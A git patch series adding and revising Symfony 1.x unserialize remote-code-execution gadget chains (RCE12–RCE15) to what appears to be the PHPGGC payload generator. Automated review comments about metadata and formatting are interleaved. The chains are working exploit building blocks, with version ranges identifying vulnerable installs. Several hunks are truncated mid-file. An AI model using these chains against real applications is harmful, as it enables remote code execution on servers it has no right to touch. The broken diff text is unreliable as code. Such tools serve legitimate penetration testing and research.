From 78270d74cfbd09c2a5c14b1737d93b475240f2e3 Mon Sep 17 00:00:00 2001 From: darkpills <> Date: Thu, 29 Feb 2024 19:31:30 +0100 Subject: [PATCH 1/3] Fixing version description to include the boundaries --- gadgetchains/Symfony/RCE/12/chain.php | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/gadgetchains/Symfony/RCE/12/chain.php b/gadgetchains/Symfony/RCE/12/chain.php index b97921f5..cfe861b5 100755 --- a/gadgetchains/Symfony/RCE/12/chain.php +++ b/gadgetchains/Symfony/RCE/12/chain.php @@ -4,11 +4,10 @@ class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall { - // This chain is still valid for latest version of Symfony 1.15 if it's installed with git clone - // which triggers submodules (not via composer) - public static $version = '1.3.0 < 1.5.13~17'; + public static $version = '1.3.0 <= 1.5.13~17'; public static $vector = '__destruct'; public static $author = 'darkpills'; + public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method (not composer)'; public function generate(array $parameters) { From 07c9555ef49a392483204562d20d1e07c97ea595 Mon Sep 17 00:00:00 2001 From: darkpills <> Date: Thu, 29 Feb 2024 23:37:41 +0100 Subject: [PATCH 2/3] Replacing initial chains with alternative chains for Symfony 1.x from 1.0.0 to 1.2.12 --- gadgetchains/Symfony/RCE/13/chain.php | 38 ++++---------------- gadgetchains/Symfony/RCE/13/gadgets.php | 46 +++++-------------------- gadgetchains/Symfony/RCE/14/chain.php | 20 +++++++++++ gadgetchains/Symfony/RCE/14/gadgets.php | 42 ++++++++++++++++++++++ gadgetchains/Symfony/RCE/15/chain.php | 20 +++++++++++ gadgetchains/Symfony/RCE/15/gadgets.php | 38 ++++++++++++++++++++ 6 files changed, 136 insertions(+), 68 deletions(-) create mode 100755 gadgetchains/Symfony/RCE/14/chain.php create mode 100755 gadgetchains/Symfony/RCE/14/gadgets.php create mode 100755 gadgetchains/Symfony/RCE/15/chain.php create mode 100755 gadgetchains/Symfony/RCE/15/gadgets.php 
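Review bot: The new `$information` string in RCE12 drops the one detail the removed comment carried, namely that the git install matters because it pulls in submodules, and the `~17` suffix in `$version` is left for the reader to decode. This metadata is what a reader uses to decide whether a given install falls in range, so I would spell both out, e.g. `public static $information = 'Up to 1.5.13 inclusive; up to 1.5.17 inclusive when installed from git with submodules (not via composer)';`. The inclusive reading is inferred from the `<` to `<=` change and the commit subject, so confirm it before merging. The class body continues outside the hunk.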
diff --git a/gadgetchains/Symfony/RCE/13/chain.php b/gadgetchains/Symfony/RCE/13/chain.php index d3fbe31f..83432af4 100755 --- a/gadgetchains/Symfony/RCE/13/chain.php +++ b/gadgetchains/Symfony/RCE/13/chain.php @@ -4,41 +4,17 @@ class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall { - public static $version = '1.0.0 < 1.2.12'; - public static $vector = '__destruct'; + public static $version = '1.2.0 <= 1.2.12'; + public static $vector = 'Serializable'; public static $author = 'darkpills'; - - - public function process_serialized($serialized) - { - $serialized2 = $serialized; - - // Leveraging PHP Bug #49649 - // insert the same $output attribute of lime_test class, but with public visibility - // for breaking change between 1.2.8 and 1.2.9 in lime_test attributes - $find = '#s:9:".\\*.output";(.*}}})s:10:".\\*.results";#'; - $replace = 's:9:"'.chr(0).'*'.chr(0).'output";${1}s:6:"output";${1}s:10:"'.chr(0).'*'.chr(0).'results";'; - $serialized2 = preg_replace($find, $replace, $serialized2); - - // update the number of properties - $find = '#"lime_test":8#'; - $replace = '"lime_test":9'; - $serialized2 = preg_replace($find, $replace, $serialized2); - - return $serialized2; - } + public static $information = 'With sfDoctrinePlugin enabled'; public function generate(array $parameters) { - $value = array($parameters['parameter']); - $escaper1 = new \sfOutputEscaperArrayDecorator($parameters['function'], $value); - - $lime_colorizer = new \lime_colorizer(); - $escaper2 = new \sfOutputEscaperObjectDecorator(array($escaper1, "current"), $lime_colorizer); - - $lime_output = new \lime_output_color($escaper2); - $lime_test = new \lime_test($lime_output); + $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter'])); - return $lime_test; + $pager = new \sfDoctrinePager($escaper); + + return $pager; } } diff --git a/gadgetchains/Symfony/RCE/13/gadgets.php b/gadgetchains/Symfony/RCE/13/gadgets.php index b3c548fe..305447bc 100644 
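Review bot: `$version` in RCE13 now starts at `1.2.0`, while the removed value and this commit's subject both give a range starting at 1.0.0, and nothing in the class says where the lower releases went. The third patch in the series shows RCE15 declaring `'1.0.0 <= 1.1.9'`, so the split looks intentional, but a reader of this file alone cannot tell. A short class-level comment would make the metadata self-explanatory: it should say that this entry applies only when sfDoctrinePlugin is enabled and that earlier 1.x releases are covered by the sibling entries. Separately, `$pager` is assigned and returned on the next line; `return new \sfDoctrinePager($escaper);` is enough.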
--- a/gadgetchains/Symfony/RCE/13/gadgets.php +++ b/gadgetchains/Symfony/RCE/13/gadgets.php @@ -1,52 +1,24 @@ output = $output; + public function __construct($prop) { + $this->prop = $prop; } -} - -class lime_output_color -{ - public $colorizer = null; - function __construct($colorizer) + public function serialize() { - $this->colorizer = $colorizer; + return serialize($this->prop); } -} - - -class sfOutputEscaperObjectDecorator -{ - protected $value; - protected $escapingMethod; - - public function __construct($escapingMethod, $value) { - $this->escapingMethod = $escapingMethod; - $this->value = $value; + public function unserialize($serialized) + { } } -class lime_colorizer -{ -} - - class sfOutputEscaperArrayDecorator { protected $value; diff --git a/gadgetchains/Symfony/RCE/14/chain.php b/gadgetchains/Symfony/RCE/14/chain.php new file mode 100755 index 00000000..1fb6a0bf --- /dev/null +++ b/gadgetchains/Symfony/RCE/14/chain.php @@ -0,0 +1,20 @@ +dateString = $dateString; + $this->tzString = $tzString; + } +} + + +class sfOutputEscaperObjectDecorator +{ + protected $value; + + protected $escapingMethod; + + public function __construct($escapingMethod, $value) { + $this->escapingMethod = $escapingMethod; + $this->value = $value; + } +} + +class sfCultureInfo +{ + protected $dataFileExt = '.dat'; + protected $data = array(); + protected $culture; + protected $dataDir; + protected $dataFiles = array(); + protected $dateTimeFormat; + protected $numberFormat; + protected $properties = array(); + + public function __construct($culture) { + $this->culture = $culture; + } + +} \ No newline at end of file diff --git a/gadgetchains/Symfony/RCE/15/chain.php b/gadgetchains/Symfony/RCE/15/chain.php new file mode 100755 index 00000000..1cb75947 --- /dev/null +++ b/gadgetchains/Symfony/RCE/15/chain.php 
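Review bot: The added `unserialize($serialized)` method in the new stub in `13/gadgets.php` has an empty body and no comment, so it reads as unfinished rather than deliberate. If the no-op is intended, say so in place, for example `// intentionally empty: this stub is only ever serialized` (wording to be confirmed by the author). The stub's class declaration line is not visible in the hunk as shown here, so I cannot confirm whether it declares `implements \Serializable`. If it does, PHP 8.1 and later report a deprecation for classes that implement only that interface, which is worth a one-line comment too.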
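Review bot: The new file `gadgetchains/Symfony/RCE/14/gadgets.php` ends without a trailing newline (`\ No newline at end of file`), and `gadgetchains/Symfony/RCE/15/gadgets.php` in the same commit carries the same marker. Ending both files with a newline keeps later diffs from touching the closing `}` line and matches the modified `13/gadgets.php`, which shows no such marker.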
@@ -0,0 +1,20 @@ +escapingMethod = $escapingMethod; + $this->value = $value; + } +} + +class MySQLiTableInfo +{ + + protected $name; + protected $columns = array(); + protected $foreignKeys = array(); + protected $indexes = array(); + protected $primaryKey; + protected $pkLoaded = false; + protected $fksLoaded = false; + protected $indexesLoaded = false; + protected $colsLoaded = false; + protected $vendorLoaded = false; + protected $vendorSpecificInfo = array(); + protected $conn; + protected $database; + protected $dblink; + protected $dbname; + + public function __construct($columns) + { + $this->columns = $columns; + } +} \ No newline at end of file From fdc67d85eb694ffb07e9d2253b1e717fa30068a8 Mon Sep 17 00:00:00 2001 From: darkpills <> Date: Sat, 2 Mar 2024 11:32:21 +0100 Subject: [PATCH 3/3] Fixing description of Symfony/RCE/15 --- gadgetchains/Symfony/RCE/15/chain.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gadgetchains/Symfony/RCE/15/chain.php b/gadgetchains/Symfony/RCE/15/chain.php index 1cb75947..0d94a312 100755 --- a/gadgetchains/Symfony/RCE/15/chain.php +++ b/gadgetchains/Symfony/RCE/15/chain.php @@ -7,7 +7,7 @@ class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall public static $version = '1.0.0 <= 1.1.9'; public static $vector = '__wakeup'; public static $author = 'darkpills'; - public static $information = 'With sfPropelPlugin enabled, which contains Creole ORM'; + public static $information = 'With Creole ORM'; public function generate(array $parameters) {